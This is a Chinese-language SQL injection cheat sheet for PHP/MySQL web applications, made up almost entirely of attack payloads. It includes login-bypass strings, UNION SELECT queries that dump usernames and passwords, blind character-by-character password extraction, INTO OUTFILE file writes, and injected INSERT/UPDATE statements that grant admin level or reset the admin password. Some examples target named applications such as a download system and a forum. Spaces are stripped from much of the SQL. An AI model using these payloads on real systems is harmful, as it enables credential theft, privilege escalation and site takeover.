【导读】PHP注入程序
php注射库
'or1=1
'or'1=1
'/*
'%23
'andpassword='mypass
id=-1unionselect1,1,1
id=-1unionselectchar(97),char(97),char(97)
id=1unionselect1,1,1frommembers
id=1unionselect1,1,1fromadmin
id=1unionselect1,1,1fromuser
userid=1andpassword=mypass
userid=1andmid(password,3,1)=char(112)
userid=1andmid(password,4,1)=char(97)
andord(mid(password,3,1))>111(ord函数很好用,可以返回整形的)
'andLENGTH(password)='6(探测密码长度)
'andLEFT(password,1)='m
'andLEFT(password,2)='my
…………………………依次类推
'unionselect1,username,passwordfromuser/*
'unionselect1,username,passwordfromuser/*
='unionselect1,username,passwordfromuser/*(可以是1或者=后直接跟)
99999'unionselect1,username,passwordfromuser/*
'intooutfile'c:/file.txt(导出文件)
='or1=1intooutfile'c:/file.txt
1'unionselect1,username,passwordfromuserintooutfile'c:/user.txt
selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt'
id='unionselect1,username,passwordfromuserintooutfile
id=-1unionselect1,database(),version()(灵活应用查询)
常用查询测试语句,
select*FROMtablewhere1=1
select*FROMtablewhere'uuu'='uuu'
select*FROMtablewhere1<>2
select*FROMtablewhere3>2
select*FROMtablewhere2<3
select*FROMtablewhere1
select*FROMtablewhere1+1
select*FROMtablewhere1--1
select*FROMtablewhereISNULL(NULL)
select*FROMtablewhereISNULL(COT(0))
select*FROMtablewhere1ISNOTNULL
select*FROMtablewhereNULLISNULL
select*FROMtablewhere2BETWEEN1AND3
select*FROMtablewhere'b'BETWEEN'a'AND'c'
select*FROMtablewhere2IN(0,1,2)
select*FROMtablewhereCASEWHEN1>0THEN1END
例如:夜猫下载系统1.0版本
id=1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_user
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1
id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1
unionselect1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1(替换,寻找密码)
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,1,1))=49(验证第一位密码)
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,2,1))=50(第二位)
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
构造语句:
selectallowsmilies,public,userid,eventdate,event,subjectFROMcalendar_eventswhereeventid=1union(select1,1,1,1,1,1,1fromuserwhereuserid=1)
selectallowsmilies,public,userid,eventdate,event,subjectFROMcalendar_eventswhereeventid=1union(select1,1,1,1,username,passwordfromuserwhereuserid=1)
union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate(查沙子的id)
(selectaFROMtable_namewherea=10ANDB=1ORDERBYaLIMIT10)
select*FROMarticlewherearticleid='$id'unionselect*FROM……(字段和数据库相同情况下,可直接提交)
select*FROMarticlewherearticleid='$id'unionselect1,1,1,1,1,1,1FROM……(不同的情况下)
特殊技巧:在表单,搜索引擎等地方写:
"___"
".__"
"%
%'ORDERBYarticleid/*
%'ORDERBYarticleid#
__'ORDERBYarticleid/*
__'ORDERBYarticleid#
$command="dirc:\";system($command);
select*FROMarticlewherearticleid='$id'
select*FROMarticlewherearticleid=$id
1'and1=2unionselect*fromuserwhereuserid=1/*句中变为
(select*FROMarticlewherearticleid='1'and1=2unionselect*fromuserwhereuserid=1/*')
1and1=2unionselect*fromuserwhereuserid=1
语句形式:建立一个库,插入:
createDATABASE`injection`
createTABLE`user`(
`userid`int(11)NOTNULLauto_increment,
`username`varchar(20)NOTNULLdefault'',
`password`varchar(20)NOTNULLdefault'',
PRIMARYKEY(`userid`)
);
insertINTO`user`VALUES(1,'swap','mypass');
插如一个注册用户:
insertINTO`user`(userid,username,password,homepage,userlevel)VALUES('','$username','$password','$homepage','1');
"insertINTOmembres(login,password,nom,email,userlevel)VALUES('$login','$pass','$nom','$email','1')";
insertINTOmembres(login,password,nom,email,userlevel)VALUES('','','','','3')#','1')
"insertINTOmembresSETlogin='$login',password='$pass',nom='$nom',email='$email'";
insertINTOmembresSETlogin='',password='',nom='',userlevel='3',email=''
"insertINTOmembresVALUES('$id','$login','$pass','$nom','$email','1')";
updateuserSETpassword='$password',homepage='$homepage'whereid='$id'
updateuserSETpassword='MD5(mypass)'whereusername='admin'#)',homepage='$homepage'whereid='$id'
"updatemembresSETpassword='$pass',nom='$nom',email='$email'whereid='$id'";
updatemembresSETpassword='[PASS]',nom='',userlevel='3',email=''whereid='[ID]'
"updatenewsSETVotes=Votes+1,score=score+$notewhereidnews='$id'";
长用函数:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
updatearticleSETtitle=$titlewherearticleid=1对应函数
updatearticleSETtitle=DATABASE()whereid=1
#把当前数据库名更新到title字段
updatearticleSETtitle=USER()whereid=1
#把当前MySQL用户名更新到title字段
updatearticleSETtitle=SYSTEM_USER()whereid=1
#把当前MySQL用户名更新到title字段
updatearticleSETtitle=SESSION_USER()whereid=1
#把当前MySQL用户名更新到title字段
updatearticleSETtitle=CURRENT_USER()whereid=1
#把当前会话被验证匹配的用户名更新到title字段
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req="select*FROMmembreswherenamelike'%$search%'ORDERBYname";
select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname
select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname
selectuidFROMadminswherelogin=''OR'a'='a'ANDpassword=''OR'a'='a'(经典)
selectuidFROMadminswherelogin=''ORadmin_level=1#'ANDpassword=''
select*FROMtablewheremsglike'%hop'
selectuidFROMmembreswherelogin='Bob'ANDpasswordlike'a%'#'ANDpassword=''
select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname